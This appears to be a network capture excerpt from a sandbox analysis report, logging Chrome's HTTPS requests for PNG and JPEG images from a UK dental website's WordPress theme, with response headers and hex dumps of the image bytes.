                                                                                                                                      2024-04-24 10:13:28 UTC385OUTGET /wp-content/uploads/2017/03/reason-4.png HTTP/1.1
                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:29 UTC466INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:13:29 GMT
                                                                                                                                      content-type: image/png
                                                                                                                                      last-modified: Fri, 14 Feb 2020 06:32:26 GMT
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 2702
                                                                                                                                      date: Wed, 24 Apr 2024 10:13:29 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:13:29 UTC902INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8c 00 00 00 8c 08 06 00 00 00 ae c0 41 3e 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 0a 30 49 44 41 54 78 da ec 5d ed 71 db 38 10 a5 34 fe 7f 4c 01 37 66 2a 30 53 81 99 0e 94 0a 8e ae 20 4a 05 e1 55 a0 a4 02 39 15 d8 a9 80 52 05 92 2a 10 3d 57 80 74 15 e8 40 1f 38 e7 53 88 ef 05 89 05 f7 cd 70 94 d8 32 09 60 1f de 7e 00 24 67 c9 c4 70 b9 5c 0a f6 91 b3 e3 96 7f a6 fc 53 17 7b 76 9c f9 e7 a1 fd 9c cd 66 fb 84 10 0d 41 32 76 2c d9 51 5f fc e1 c8 8e 55 7b 2d 1a 71 bc 44 29 d9 b1 bb 0c 8f 96 38 29 59 00 07 49 52 76 54 ec 38 5d c6 c5 8e 48 13 3e 59 16 dc 35 84 82 28 49 33 8b 41 55 d8 c7 9a 1d 8b 00 9b f7 8d 1d 3f db 20 99 02 e3 30
                                                                                                                                      Data Ascii: PNGIHDRA>tEXtSoftwareAdobe ImageReadyqe<0IDATx]q84L7f*0S JU9R*=Wt@8Sp2`~$gp\S{vfA2v,Q_U{-qD)8)YIRvT8]H>Y5(I3AU? 0
                                                                                                                                      2024-04-24 10:13:29 UTC1800INData Raw: cb 11 db b5 0c 59 fd a6 4e 9a 4a f2 ae e8 7c 84 f6 e4 92 f6 54 64 b1 30 48 b3 93 cc e8 7c 60 b2 9c 62 a9 ea c6 4c 18 d9 ac de 0d 91 6a f3 14 7a 17 92 da 11 e4 06 2b 15 a4 c9 3d 13 56 46 96 92 2c 84 2b 6b ea dc 53 e1 e1 9a 85 c4 0d 51 56 84 80 34 f5 45 8e 0a f0 5a 95 e2 5a 35 59 24 7c c2 a8 62 89 6e 09 a1 70 54 95 a3 e2 1a 3b 5a 5c 8c 8b 34 1d 71 4a 1d c3 f2 73 96 1a 44 89 9a 2c b3 c8 89 d3 c6 0f ba 01 67 f7 e8 f8 97 ab 9f b7 4f 5a c8 13 fd 9b e6 1e 67 b3 d9 03 4d 5b bc a4 59 2a 82 52 28 9c c6 ac 2e 13 ec dc 50 2a f8 5d a6 11 0c bb a0 16 95 fc 65 ed 22 8c 43 94 05 3b 9e b8 e1 16 1a df 3d 02 12 e5 a8 79 cd 0b 6f e3 82 2c 36 0e 49 5a c5 58 f5 b8 9a 4a f3 ef 8b 37 24 b3 c1 5a 37 cb ea 49 bd 4f bc ed 54 f9 1d c0 e5 94 8a ec a7 b6 54 a8 8a bb 95 5a e0 6e 6a fe
                                                                                                                                      Data Ascii: YNJ|Td0H|`bLjz+=VF,+kSQV4EZZ5Y$|bnpT;Z\4qJsD,gOZgM[Y*R(.P*]e"C;=yo,6IZXJ7$Z7IOTTZnj


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      64192.168.2.164978791.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:30 UTC407OUTGET /wp-content/themes/dentalhealthstop/images/dhs-logo-footer.png HTTP/1.1
                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:30 UTC466INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:13:30 GMT
                                                                                                                                      content-type: image/png
                                                                                                                                      last-modified: Fri, 14 Feb 2020 06:32:12 GMT
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 6532
                                                                                                                                      date: Wed, 24 Apr 2024 10:13:30 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:13:30 UTC902INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 55 00 00 00 a4 08 06 00 00 00 be 57 db 27 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 19 26 49 44 41 54 78 da ec 9d d1 75 9b 48 17 c7 89 4f de a3 ef d9 0f ab 54 10 a5 02 e3 0a e2 54 10 b9 02 c7 15 d8 ae 20 76 05 96 2b 88 5c 41 70 05 51 2a 08 fb a0 e7 d5 56 b0 1f 37 be ec 12 8c 60 98 19 60 40 bf df 39 1c 47 8a 80 99 e1 c2 fc b9 73 e7 4e 14 01 00 00 00 80 33 af 7c 1c 64 bb dd ce b3 3f f3 a6 df 1d 1f 1f 27 34 39 00 00 00 20 aa 7e 17 52 b3 ec cf 59 b6 7d ca b6 b8 c5 ae 9b 6c 13 71 f5 90 89 ac 0d 97 00 00 00 00 0e 52 54 65 62 2a 56 21 b5 f4 70 fe 34 db ee b2 6d 95 09 ac 1d 97 03 00 00 00 26 2f aa d4 33 75 1f 3d 7b a7 7c 23 82 ea 2e
                                                                                                                                      Data Ascii: PNGIHDRUW'tEXtSoftwareAdobe ImageReadyqe<&IDATxuHOTT v+\ApQ*V7``@9GsN3|d?'49 ~RY}lqRTeb*V!p4m&/3u={|#.
                                                                                                                                      2024-04-24 10:13:30 UTC5630INData Raw: 15 00 00 40 58 bc de 23 20 5c 44 d5 9f 03 0b 29 f1 fa 2c 55 4c b9 d4 23 17 52 9d 2e d4 ac de ae 8f 9a ce 61 d9 a6 9e 21 79 03 01 00 00 10 55 2f 91 c5 88 e3 b1 55 c4 d3 10 9f 88 27 89 07 5b f7 9d 63 4b bc 7b 5a 87 18 b3 04 00 00 98 86 a8 4a 1d 8f f9 a6 a5 18 ca 67 c4 ad 6d 3c 2f 1e 86 f8 92 82 90 4a 07 be 1e 37 a6 f5 c0 4b 05 00 00 30 7d 51 d5 76 66 9a 9c ef 7b b6 dd 67 02 49 04 ce 93 0a 9d 5d 95 b7 48 73 4b cd a3 e7 45 94 6d 53 14 c8 f1 1f 6c 85 5c 57 c8 2c 42 6d 83 26 61 85 a0 02 00 00 08 8c ca 60 67 c7 19 80 49 26 0e 5a ad 4d a7 69 06 ee 3b ae ab 08 91 55 f4 9c 02 21 0d f5 82 18 2e 6a 1d cc 64 00 00 00 00 78 e6 68 cf f7 7d c7 13 89 d8 39 8f ba f1 c0 48 b0 f9 c7 ec 1c 92 e6 e1 32 64 41 a5 6d 91 44 cd de c2 47 4c 17 00 00 60 1c a2 2a 71 38 a6 55 62 4a 15
                                                                                                                                      Data Ascii: @X# \D),UL#R.a!yU/U'[cK{ZJgm</J7K0}Qvf{gI]HsKEmSl\W,Bm&a`gI&ZMi;U!.jdxh}9H2dAmDGL`*q8UbJ


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      65192.168.2.164978891.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:30 UTC674OUTGET /wp-content/uploads/2017/03/home-intro.jpg HTTP/1.1
                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://dentalhealthstop.co.uk/wp-content/themes/dentalhealthstop/style.css
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:30 UTC469INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:13:30 GMT
                                                                                                                                      content-type: image/jpeg
                                                                                                                                      last-modified: Fri, 14 Feb 2020 06:32:22 GMT
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 119599
                                                                                                                                      date: Wed, 24 Apr 2024 10:13:30 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:13:30 UTC899INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 32 00 00 ff e1 03 81 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                      Data Ascii: ExifII*Ducky2http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                      2024-04-24 10:13:31 UTC14994INData Raw: 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 08 06 06 06 06 06 08 06 06 08 0c 08 07 08 0c 0e 0a 08 08 0a 0e 10 0d 0d 0e 0d 0d 10 11 0c 0e 0d 0d 0e 0c 11 0f 12 13 14 13 12 0f 18 18 1a 1a 18 18 23 22 22 22 23 27 27 27 27 27 27 27 27 27 27 01 09 08 08 09 0a 09 0b 09 09 0b 0e 0b 0d 0b 0e 11 0e 0e 0e 0e 11 13 0d 0d 0e 0d 0d 13 18 11 0f 0f 0f 0f 11 18 16 17 14 14 14 17 16 1a 1a 18 18 1a 1a 21 21 20 21 21 27 27 27 27 27 27 27 27 27 27 ff c0 00 11 08 03 e8 06 de 03 01 22 00 02 11 01 03 11 01 ff c4 00 bd 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 01 01 01 01 01 01 01 01 00
                                                                                                                                      Data Ascii: on> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Adobed#"""#''''''''''!! !!''''''''''"
                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: bd 8f 85 6e 91 85 c8 49 a5 bc 96 bf 13 7a d9 d9 8b 2b 24 6e e3 d9 f3 c5 2e 6e 0e 4b 9d bf 98 4f 31 cd a7 39 4a 8b 65 2f d4 a8 4d c2 c2 fa e2 d2 ed 83 6d 16 c7 03 06 16 e3 73 22 3c bc ca b0 52 93 52 6b f6 94 55 74 37 c7 c6 b1 cf 68 a1 65 ed 25 6d ba 2a c5 ca 89 57 c0 a9 4e f6 4c d4 1c 65 73 b2 dc 7f 52 3a 1e 8e 1d ab 49 c5 43 ce f5 6d 4a 52 4a 95 8e 9e 5d c9 4e 51 56 94 54 a7 6e de ca 09 ab 7a 76 d2 34 75 26 67 a1 8b de a9 ff 00 2f 92 e5 77 9d ab 0a 5f 81 ca b2 f9 3a 23 4c 30 f1 ae 5a 56 e4 e8 a3 2e 6b b2 af 2a d3 44 aa d2 5a 77 12 b1 f9 6b 36 eb 6e ad f1 71 54 7b 71 93 f3 0b f3 8a aa 36 f1 a0 df 16 fc cf bb 89 33 b5 ce 16 49 dc 47 1b a7 c2 9c aa 73 69 e9 08 3a a6 bf 79 c4 d5 cb 89 58 bb 96 ae 5b 5c 23 29 47 95 2e ea 38 9c eb 99 17 62 d2 ba f6 da 3a ad 3c
                                                                                                                                      Data Ascii: nIz+$n.nKO19Je/Mms"<RRkUt7he%m*WNLesR:ICmJRJ]NQVTnzv4u&g/w_:#L0ZV.k*DZwk6nqT{q63IGsi:yX[\#)G.8b:<
                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: 00 00 00 00 06 02 18 00 00 00 0c 40 03 00 00 00 00 01 80 00 00 00 00 0c 43 00 00 00 01 88 60 00 00 00 31 00 0c 00 00 06 20 01 80 00 00 00 01 65 f9 2f 5e ea aa fa e5 f7 94 5d 87 ab 0e 56 d2 d5 3a d7 b1 d4 be fe 35 a7 91 76 5c ba b9 c9 bf 99 5f e5 ad f6 7d a6 a6 d6 5c cb d1 2e b2 f1 4d 37 dd f3 0e 67 dd f3 17 e5 ad f6 3f 98 7e 5a df 7f cd 8f 75 3d b1 2a be ef 99 5d eb 7e ac 54 6b 4a 49 4a b5 ec 75 1f e5 ad f7 fc c7 f9 68 77 fc cb 36 b2 e6 5e 89 ed 97 83 ab ee f9 8e af bb e6 43 f2 d0 ed 7f 30 fc b4 3b 5f cc 9e ea be d8 9d 5f fa 30 ab ff 00 46 43 f2 d1 ed 7f 30 fc b4 7f 6a 5f 31 ee a6 22 75 7d 9f 68 55 f6 7d a5 7f 96 5f b5 2f 98 7e 55 7e dc be 63 dd 4c 45 95 7d 9f 6a 0a be c2 af ca af db 97 cc 3f 2b ff 00 99 2f 98 f7 53 11 65 5f 67 dc 3a be c2 9f ca bf fc 49
                                                                                                                                      Data Ascii: @C`1 e/^]V:5v\_}\.M7g?~Zu=*]~TkJIJuhw6^C0;__0FC0j_1"u}hU}_/~U~cLE}j?+/Se_g:I
                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: 53 b2 51 a9 f5 bc 8c 65 76 cf 2c 68 ae 43 58 b3 8e f2 e3 69 fa 77 55 2e 2a f3 73 6d a1 d2 fa d7 7f 06 d9 d7 a6 6c ec f9 6e 6f 55 b3 79 c6 dd d8 a8 4e b4 ec 75 7e 26 4b f9 d6 97 3c 23 71 2a 51 ef 4e 07 d4 3a 9f 4d f6 f7 59 c7 94 b3 f1 6d ca e5 1d 2e a4 94 93 e1 aa d4 f1 59 3e c1 b5 72 b7 ac e6 28 63 5a 75 8a b9 14 e4 d2 7d b5 5a 09 35 ff 00 57 ec 74 bb 6d 8e 34 f8 75 c3 cd 5a bf 1b 8a 12 e7 fa 9d 25 c7 e4 6d b7 91 7a ca e7 b5 76 51 a6 b5 52 d2 9e 06 cc cf 69 5c b0 f9 e1 97 09 3d 3c b1 8d 35 7c 3c 4e 6e 57 48 ce b7 1e 58 5d 8b 6a 91 d9 d0 59 33 c5 89 26 d8 fc da ff 00 17 63 1f dc 7d 43 1f 96 b7 23 75 52 b4 7b 9d cc 1f 79 d9 95 21 91 17 09 3e 3b a3 c0 cb 1f a9 59 4d 38 29 be e7 fa ca a5 2c 8b 69 41 d8 96 8b 5a 13 da c6 da eb 7a c7 d8 6d 75 7c 1b f1 5c 97 12
                                                                                                                                      Data Ascii: SQev,hCXiwU.*smlnoUyNu~&K<#q*QN:MYm.Y>r(cZu}Z5Wtm4uZ%mzvQRi\=<5|<NnWHX]jY3&c}C#uR{y!>;YM8),iAZzmu|\
                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: be 3b f2 7d bf af ff 00 30 fa 07 4b 87 2d 9c b8 73 4e aa 4a d3 f5 2e 45 ae 0e 2b 63 e7 fd 5b f9 b1 6d d8 96 2f 48 c3 7e 77 5b 99 39 32 ac a5 fe ac 7f 59 f2 d6 db 5e 67 51 c6 29 6a fe 08 f2 df be de 4c 78 f5 9a 4f 5e bb 7d 6b 7f d2 9d f9 77 e7 ef 2f 70 c9 dd 76 73 6e 58 57 a9 ea fa 4f 91 ba 68 97 34 75 a1 c7 77 2f dc 6d ce 6d b7 ab ab dd 90 5c ae 94 d1 71 a9 34 fb 74 a6 c8 f3 f9 3c de 4f 25 cf 93 7d b6 f9 d6 e4 92 71 24 4a 31 ae 8c 93 4b 44 93 f0 12 9f 2a a5 77 d5 07 e6 12 8d 22 ab af d5 4a ea 73 52 56 9c 9e 9f 31 fa 34 7a aa f8 13 f5 a7 3d 21 0a be 2e 9b 91 92 c8 dd d1 77 54 07 18 a4 93 4f c0 8d cb 7c ea 89 fc fb 04 e3 35 5f 32 d7 65 5e 21 07 77 44 9a 6f 8d 48 3e 9f fc 9e c9 c9 87 f9 86 04 aa ec 79 6f 27 c1 4b e8 d3 c4 fa a9 f2 9f e5 46 7c 63 93 9f 87 28
                                                                                                                                      Data Ascii: ;}0K-sNJ.E+c[m/H~w[92Y^gQ)jLxO^}kw/pvsnXWOh4uw/mm\q4t<O%}q$J1KD*w"JsRV14z=!.wTO|5_2e^!wDoH>yo'KF|c(
                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: 92 49 f9 6d c5 73 72 37 a3 e1 a9 a4 74 ad ce 39 0b 9a 71 a4 2d af 3b 5f 4f 33 e1 a6 a8 a3 d4 e5 e4 f5 5f 32 8d 5c 68 eb ca ab b1 92 e5 fa 39 d6 4a 35 6b cb 1d 15 5f 79 6c f2 25 cb 18 a4 a4 ad a4 bc 69 b3 ed 74 03 a9 d3 ef d9 cb 85 de 91 7e b2 b3 7f fb a7 5d 2d dc 5f 4b af 79 56 76 0e 45 9e 9b 19 5d 5c b7 30 af 3b 73 5d 9c c6 48 4d bb 31 71 6a dd c5 24 9b 55 4d ad ea fb d1 ec 6c db 8f 5c e8 b9 32 ff 00 89 3b 2e 37 3b 5d cb 6b 99 4b e2 78 be ef c5 ef d6 6d 3a c7 a3 c1 e4 f6 dc 5e ed fe d2 ce f5 b0 95 a9 4a ba 7d c7 b9 c6 9f 3d 98 be 34 a3 3e 41 ec dc c9 46 f4 ac cb 47 17 46 7d 67 a7 cd 3b 49 2e 2a a7 97 ec f7 e7 db 7b 71 fe 4e bf 71 af 79 df 96 c4 31 01 ee 79 8c 00 0a 80 00 00 60 21 80 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                      Data Ascii: Imsr7t9q-;_O3_2\h9J5k_yl%it~]-_KyVvE]\0;s]HM1qj$UMl\2;.7;]kKxm:^J}=4>AFGF}g;I.*{qNqy1y`!
                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: 9c b5 3a 2d 00 03 2a 06 20 08 63 12 19 42 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 04 00 31 0a a0 48 04 86 00 00 00 30 00 00 18 80 06 31 00 0c 62 00 18 c4 30 00 00 01 80 00 00 00 00 00 00 00 86 00 20 00 01 88 00 08 e4 ff 00 d4 de fd f9 7d e5 45 b9 3f f5 37 bf 7e 5f 7b 2a 00 00 00 00 00 00 00 00 01 0c 40 02 18 00 98 86 26 02 10 c4 02 13 18 80 42 24 20 22 03 11 05 f6 f6 34 5b 33 db d8 be de e6 a0 b9 ec 73 f2 77 3a 0f 63 9f 93 b8 a3 30 86 00 20 00 20 40 31 32 84 26 31 32 05 40 00 00 00 00 18 00 c0 00 06 02 18 00 00 c0 10 05 00 60 00 14 18 00 86 30 28 00 28 30 15 06 01 c0 0c 19 7b 33 99 2d da 3a 99 7b 33 97 2d ce 7b 75 58 88 ff 00 49 11 90 31 d4 8d 46 98 12 dc 10 be 20 88 a6 35 f6 89 ba 80 44 80 88 ea 06 5e a5 83 6b a8 e1 dc c4 ba ab 19
                                                                                                                                      Data Ascii: :-* cB1H01b0 }E?7~_{*@&B$ "4[3sw:c0 @12&12@`0((0{3-:{3-{uXI1F 5D^k
                                                                                                                                      2024-04-24 10:13:31 UTC5402INData Raw: 5d 6a b3 97 2c 59 ea fa 26 23 8c 54 de f2 dd f6 2a 6b 53 89 d3 31 3d 49 d6 54 a7 63 3d 44 ae ac 57 0c 68 e9 72 e2 5e a4 16 d1 8f 05 f1 39 79 bc b3 c7 a5 de f6 e9 f3 6f c7 a5 df 79 ac ee f4 7d 1a fc 23 6e eb 49 25 ca d4 3b 95 0e 45 f8 56 7e 5d 99 a3 0b 99 41 b5 a2 6a 85 d7 ed 72 c5 34 bc cd 1f 9f df 7b b5 cd e6 db 6f e2 fa 7a eb 27 4f 84 5d d1 a3 5b 13 6d 78 1e af 1f 35 d8 b6 b9 9f 03 81 d3 6c f2 63 2d 77 2f c8 bc ab e9 f1 47 7f b6 cf bf 33 d1 c7 cd d3 ea d1 3c e4 ef 4a 69 d7 9b 71 dc 94 6e 5b e5 9e b5 d8 e4 5b 9a b7 26 f8 37 a7 c4 d2 f2 12 5a 70 3d 1b 78 ff 00 35 9e ae 53 6e 20 b0 de 16 4f 34 7e 99 69 42 fc cc ab d2 52 8c 74 52 5c 3b 4a 5c a1 93 0e 68 3f 3c 76 42 8d 6e 42 bf 8a 3c 11 c7 c5 b5 f1 79 3d b7 a5 6f c9 26 fa fb bb b9 33 ce bd 16 e1 72 5c 68 4b
                                                                                                                                      Data Ascii: ]j,Y&#T*kS1=ITc=DWhr^9yoy}#nI%;EV~]Ajr4{oz'O][mx5lc-w/G3<Jiqn[[&7Zp=x5Sn O4~iBRtR\;J\h?<vBnB<y=o&3r\hK


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      66192.168.2.164979291.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:30 UTC680OUTGET /wp-content/uploads/2017/03/home-treatment-1.jpg HTTP/1.1
                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://dentalhealthstop.co.uk/wp-content/themes/dentalhealthstop/style.css
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:30 UTC469INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:13:30 GMT
                                                                                                                                      content-type: image/jpeg
                                                                                                                                      last-modified: Fri, 14 Feb 2020 06:32:24 GMT
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 124843
                                                                                                                                      date: Wed, 24 Apr 2024 10:13:30 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:13:30 UTC899INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 32 00 00 ff e1 03 81 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                      Data Ascii: ExifII*Ducky2http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                      2024-04-24 10:13:31 UTC14994INData Raw: 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 08 06 06 06 06 06 08 06 06 08 0c 08 07 08 0c 0e 0a 08 08 0a 0e 10 0d 0d 0e 0d 0d 10 11 0c 0e 0d 0d 0e 0c 11 0f 12 13 14 13 12 0f 18 18 1a 1a 18 18 23 22 22 22 23 27 27 27 27 27 27 27 27 27 27 01 09 08 08 09 0a 09 0b 09 09 0b 0e 0b 0d 0b 0e 11 0e 0e 0e 0e 11 13 0d 0d 0e 0d 0d 13 18 11 0f 0f 0f 0f 11 18 16 17 14 14 14 17 16 1a 1a 18 18 1a 1a 21 21 20 21 21 27 27 27 27 27 27 27 27 27 27 ff c0 00 11 08 03 e8 06 de 03 01 22 00 02 11 01 03 11 01 ff c4 00 af 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 01 03 02 04 05 06 07 08 01 01 01 01 01 01 01 01 00
                                                                                                                                      Data Ascii: on> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Adobed#"""#''''''''''!! !!''''''''''"
